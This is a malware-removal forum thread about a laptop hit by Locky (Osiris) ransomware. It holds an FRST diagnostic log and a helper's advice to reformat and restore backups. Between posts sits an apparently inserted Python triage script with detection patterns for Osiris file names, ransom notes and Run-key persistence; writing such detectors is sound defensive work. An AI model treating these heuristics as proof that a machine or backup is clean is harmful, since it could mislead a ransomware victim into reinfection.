FirewallRules: [{9636B7DA-DE75-4A31-9951-768DFF9B37CD}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{A4172512-EBBA-4839-99C6-6B4BBFB38DF1}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{27DBD4D5-5881-4958-B64D-C94F93A33CF3}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{C649A552-11DC-4774-966A-8C7C2AFA80A9}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{00C3FF2E-D757-425A-8B92-D0D0B281D7E7}] => C:\Program Files (x86)\AVG\AVG2014\avgmfapx.exe
FirewallRules: [{AD8FB98A-0D6E-41BB-B2CB-5DF2D3705A61}] => C:\Program Files (x86)\AVG\AVG2014\avgmfapx.exe
FirewallRules: [{45E3D5D8-1791-4E15-868E-3223AA921CE7}] => C:\Users\Karen Laptop\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{8746EE31-195A-4321-857A-5212D3CA3DED}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

15-08-2016 15:28:38 HPSF Restore Point
22-08-2016 17:04:44 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501
28-08-2016 09:31:20 Removed Blio.
28-08-2016 09:33:27 Removed Blio.
28-08-2016 09:37:52 Removed Rosetta Stone Version 3
13-09-2016 06:46:58 HPSF Restore Point
13-11-2016 09:06:29 HPSF Restore Point
21-01-2017 10:29:26 HPSF Restore Point

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/22/2017 01:05:38 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program FRST64.exe version 22.1.2017.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1d30

Start Time: 01d274f307f5da93

Termination Time: 19

Application Path: C:\Users\Karen Laptop\Downloads\FRST64.exe

Report Id:

Error: (01/22/2017 07:48:56 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/21/2017 09:54:07 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/18/2017 06:50:37 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/03/2017 04:39:11 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 15881

Error: (01/03/2017 04:39:11 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 15881

Error: (01/03/2017 03:54:23 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (01/03/2017 03:40:53 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/03/2017 02:58:03 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 142773

Error: (01/03/2017 02:58:03 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 142773


System errors:
=============
Error: (01/21/2017 11:09:32 AM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the Wlansvc service.

Error: (01/06/2017 07:39:07 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.233.3735.0

Update Source: Microsoft Update Server

Update Stage: Search

Source Path: http://www.microsoft.com

Signature Type: AntiVirus

Update Type: Full

User: NT AUTHORITY\SYSTEM

Current Engine Version:

Previous Engine Version: 1.1.13303.0

Error code: 0x8024001e

Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

Error: (01/03/2017 01:45:15 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the HPWMISVC service.

Error: (01/02/2017 08:06:53 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.233.3735.0

Update Source: Microsoft Update Server

Update Stage: Search

Source Path: http://www.microsoft.com

Signature Type: AntiVirus

Update Type: Full

User: NT AUTHORITY\SYSTEM

Current Engine Version:

Previous Engine Version: 1.1.13303.0

Error code: 0x8024001e

Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

Error: (01/01/2017 06:43:06 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.233.3735.0

Update Source: Microsoft Malware Protection Center

Update Stage: Search

Source Path: http://go.microsoft.com/fwlink/?LinkID= ... 752CCA7094

Signature Type: AntiSpyware

Update Type: Full

User: NT AUTHORITY\NETWORK SERVICE

Current Engine Version:

Previous Engine Version: 1.1.13303.0

Error code: 0x80072ee2

Error description: The operation timed out

Error: (01/01/2017 06:43:06 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.233.3735.0

Update Source: Microsoft Malware Protection Center

Update Stage: Search

Source Path: http://go.microsoft.com/fwlink/?LinkID= ... 752CCA7094

Signature Type: AntiVirus

Update Type: Full

User: NT AUTHORITY\NETWORK SERVICE

Current Engine Version:

Previous Engine Version: 1.1.13303.0

Error code: 0x80072ee2

Error description: The operation timed out

Error: (01/01/2017 06:43:06 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.233.3735.0

Update Source: Microsoft Malware Protection Center

Update Stage: Search

Source Path: http://go.microsoft.com/fwlink/?LinkID= ... 752CCA7094

Signature Type: AntiSpyware

Update Type: Full

User: NT AUTHORITY\NETWORK SERVICE

Current Engine Version:

Previous Engine Version: 1.1.13303.0

Error code: 0x80072ee2

Error description: The operation timed out

Error: (01/01/2017 06:43:06 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.233.3735.0

Update Source: Microsoft Malware Protection Center

Update Stage: Search

Source Path: http://go.microsoft.com/fwlink/?LinkID= ... 752CCA7094

Signature Type: AntiVirus

Update Type: Full

User: NT AUTHORITY\NETWORK SERVICE

Current Engine Version:

Previous Engine Version: 1.1.13303.0

Error code: 0x80072ee2

Error description: The operation timed out

Error: (12/27/2016 05:03:02 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.233.3338.0

Update Source: Microsoft Update Server

Update Stage: Search

Source Path: http://www.microsoft.com

Signature Type: AntiVirus

Update Type: Full

User: NT AUTHORITY\SYSTEM

Current Engine Version:

Previous Engine Version: 1.1.13303.0

Error code: 0x8024001e

Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

Error: (12/26/2016 06:20:53 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.233.3338.0

Update Source: Microsoft Update Server

Update Stage: Search

Source Path: http://www.microsoft.com

Signature Type: AntiVirus

Update Type: Full

User: NT AUTHORITY\SYSTEM

Current Engine Version:

Previous Engine Version: 1.1.13303.0

Error code: 0x8024001e

Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i3-2350M CPU @ 2.30GHz
Percentage of memory in use: 74%
Total physical RAM: 4043.86 MB
Available physical RAM: 1046.41 MB
Total Virtual: 8085.9 MB
Available Virtual: 4525.39 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:441.63 GB) (Free:361.77 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Recovery) (Fixed) (Total:19.97 GB) (Free:2.16 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (HP_TOOLS) (Fixed) (Total:3.96 GB) (Free:1.08 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: E861ED1B)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=441.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=20 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=4 GB) - (Type=0C)

==================== End of Addition.txt ============================
kmorod
Active Member
Posts: 5
Joined: January 22nd, 2017, 4:15 pm

Re: OSIRIS

Unread postby Gary R » January 24th, 2017, 2:25 am

As far as I'm aware, there is as yet no way to recover files encrypted by Locky (Osiris).

If you are lucky enough to have a set of uninfected backups of your files, what I strongly suggest you do is to reformat your hard drive and re-install Windows, which will remove all the Locky infection, and then re-install your backed up files.

We can of course attempt to help you clean your computer of infection signs, so that you can then install your backed up files, but IMO that is a far less secure option, and if we were to miss removing some part of your infection, it could well re-infect your machine and possibly your backed up files as well when you connect them to your computer to transfer them. If it were my computer I would not take that risk.

For further information on Locky (Osiris) please read ...

https://www.bleepingcomputer.com/news/s ... extension/
https://www.bleepingcomputer.com/forums ... tionshtml/

Please let me know how you'd like to proceed.

If you choose to reformat, there are programs we can recommend to help prevent you getting infected in this way again.
Gary R
Administrator
Posts: 25888
Joined: June 28th, 2005, 11:36 am
Location: Yorkshire

Re: OSIRIS

Unread postby kmorod » January 24th, 2017, 11:11 am

Thank you
From the log that was sent do you agree that what has corrupted my files is the OSIRIS virus?

Is there a way of knowing if my backup files are infected?

Thanks again for the help.
kmorod
Active Member
Posts: 5
Joined: January 22nd, 2017, 4:15 pm

Re: OSIRIS

Unread postby Gary R » January 24th, 2017, 12:21 pm

The following indications would strongly suggest that you have an Osiris infection ...

HKU\S-1-5-21-3553682965-2478827086-665785291-1000\...\Run: [*basllntrba<*>] => "C:\Users\Karen Laptop\AppData\Local\910c7\e8bd5.bat" <===== ATTENTION (Value Name with invalid characters)

2017-01-22 07:53 - 2017-01-22 07:53 - 00163652 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--80219FB4--9BBECE30BBA0.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00058692 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--9E950C1E--192F8B3A905A.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00047059 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--B060E460--C1AC71CF5152.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00034628 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--94F96ECD--7F70878AC416.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00026948 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--F1AC1582--EE92E9E668FA.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00015950 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--9D27223D--D189627EAC64.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00014292 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--B89F2E61--0B6490683E26.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00012486 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--22C0AAD2--FBCD5FCB8A18.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00011868 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--33C305DF--B31BB3D3BB33.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00011709 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--734137D2--1A6CFE3C6325.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00009610 _____ C:\Users\Karen Laptop\Documents\OSIRIS-35c4.htm
2017-01-22 07:53 - 2017-01-22 07:53 - 00009610 _____ C:\Users\Karen Laptop\Desktop\OSIRIS-2a43.htm
2017-01-22 07:52 - 2017-01-22 07:52 - 00000000 ____D C:\Users\Karen Laptop\AppData\Local\910c7

If you wish to make further checks, then visit ... https://id-ransomware.malwarehunterteam.com/ ... and ... https://www.nomoreransom.org/

Also please read ... https://www.bleepingcomputer.com/virus- ... p#discover ... which will give you a bit more information on Locky in general.

As far as checking your backed up files goes, you need to scan them before they are installed on a clean machine; however, you won't be able to do that until your existing machine is free from infection.
Gary R
Administrator
Posts: 25888
Joined: June 28th, 2005, 11:36 am
Location: Yorkshire
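The indicators Gary R picks out of the FRST log above (a Run value with invalid characters launching a .bat from AppData\Local, files renamed to the five-group hex pattern with an .osiris extension, and the OSIRIS-xxxx.htm ransom notes) can be turned into a small triage check that a helper could run over a log before replying, and the same file-name patterns answer the "are my backups affected?" question as a first pass. The Python below is an added example written for this thread; it is not part of FRST or of the forum's own tooling. The regular expressions are derived only from the names quoted in this thread, the sample log lines are constructed after those quoted above, and the "script in AppData\Local" heuristic is an assumption of this example rather than an FRST rule.

```python
import ntpath
import re
from typing import Dict, Iterable, List

# Rename scheme shown in the thread: five hex groups (8-4-4-8-12) joined by
# double hyphens, then the .osiris extension.
OSIRIS_RENAMED = re.compile(
    r"[0-9A-F]{8}--[0-9A-F]{4}--[0-9A-F]{4}--[0-9A-F]{8}--[0-9A-F]{12}\.osiris$",
    re.IGNORECASE,
)
# Ransom note dropped beside the encrypted files, e.g. OSIRIS-35c4.htm.
OSIRIS_NOTE = re.compile(r"OSIRIS-[0-9A-F]{4}\.htm$", re.IGNORECASE)

# FRST file entry: created/modified timestamps, 8-digit size, 5-char attribute flags, path.
FRST_FILE = re.compile(
    r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2} - \d{4}-\d{2}-\d{2} \d{2}:\d{2} - "
    r"(?P<size>\d{8}) (?P<attrs>\S{5}) (?P<path>.+)$"
)
# FRST autorun entry: ...\Run: [value name] => "target" <optional FRST remark>
FRST_RUN = re.compile(r'\\Run: \[(?P<name>[^\]]*)\] => "?(?P<target>[^"]+)"?')

# Constructed sample lines modelled on the ones quoted in this thread (not a real capture).
SAMPLE_FRST_LINES = [
    r'HKU\S-1-5-21-3553682965-2478827086-665785291-1000\...\Run: [*basllntrba<*>] => '
    r'"C:\Users\Karen Laptop\AppData\Local\910c7\e8bd5.bat" <===== ATTENTION (Value Name with invalid characters)',
    r"2017-01-22 07:53 - 2017-01-22 07:53 - 00163652 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--80219FB4--9BBECE30BBA0.osiris",
    r"2017-01-22 07:53 - 2017-01-22 07:53 - 00009610 _____ C:\Users\Karen Laptop\Documents\OSIRIS-35c4.htm",
    r"2017-01-22 07:52 - 2017-01-22 07:52 - 00000000 ____D C:\Users\Karen Laptop\AppData\Local\910c7",
    r"2017-01-20 10:00 - 2017-01-20 10:00 - 00001024 _____ C:\Users\Karen Laptop\Documents\budget.xlsx",
]


def scan_frst(lines: Iterable[str]) -> Dict[str, List[str]]:
    """Group Osiris-related findings from FRST-style log lines by indicator type."""
    findings: Dict[str, List[str]] = {
        "suspicious_run_entries": [],
        "encrypted_files": [],
        "ransom_notes": [],
        "staging_dirs": [],
    }
    run_target_dirs = set()
    dir_entries: List[str] = []

    for line in lines:
        line = line.rstrip()
        run = FRST_RUN.search(line)
        if run:
            target = run.group("target")
            # FRST flags value names with invalid characters as ATTENTION; a batch
            # file launched from the per-user AppData\Local tree is this example's
            # own (assumed) heuristic for the same persistence pattern.
            if "<===== ATTENTION" in line or (
                "\\AppData\\Local\\" in target and target.lower().endswith(".bat")
            ):
                findings["suspicious_run_entries"].append(line)
                run_target_dirs.add(ntpath.dirname(target).lower())
            continue
        entry = FRST_FILE.match(line)
        if not entry:
            continue
        path = entry.group("path")
        name = ntpath.basename(path)
        if entry.group("attrs").endswith("D"):
            dir_entries.append(path)
        elif OSIRIS_RENAMED.search(name):
            findings["encrypted_files"].append(path)
        elif OSIRIS_NOTE.search(name):
            findings["ransom_notes"].append(path)

    # Correlate: a newly created directory that also hosts the autorun target.
    findings["staging_dirs"] = [d for d in dir_entries if d.lower() in run_target_dirs]
    return findings


def check_backup_listing(names: Iterable[str]) -> List[str]:
    """Names in a backup set that already carry the Osiris rename or note pattern.

    A backup taken after the encryption ran will show up here; an empty result
    only means the names look normal, not that the set is free of the dropper.
    """
    return [
        n for n in names
        if OSIRIS_RENAMED.search(ntpath.basename(n)) or OSIRIS_NOTE.search(ntpath.basename(n))
    ]


if __name__ == "__main__":
    for kind, hits in scan_frst(SAMPLE_FRST_LINES).items():
        print(f"{kind}: {len(hits)}")
        for hit in hits:
            print("   ", hit)
```

On a real log, feed `scan_frst` the lines of FRST.txt and Addition.txt together; the staging-directory correlation only fires when both the Run entry and the directory creation appear, which is what makes the finding worth more than a bare .osiris file count. The backup listing check is a name-only first pass and does not replace scanning the backup media with an up-to-date antivirus from a clean machine, which is what Gary R advises above.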

Re: OSIRIS

Unread postby kmorod » January 24th, 2017, 12:59 pm

Thank you
kmorod
Active Member
Posts: 5
Joined: January 22nd, 2017, 4:15 pm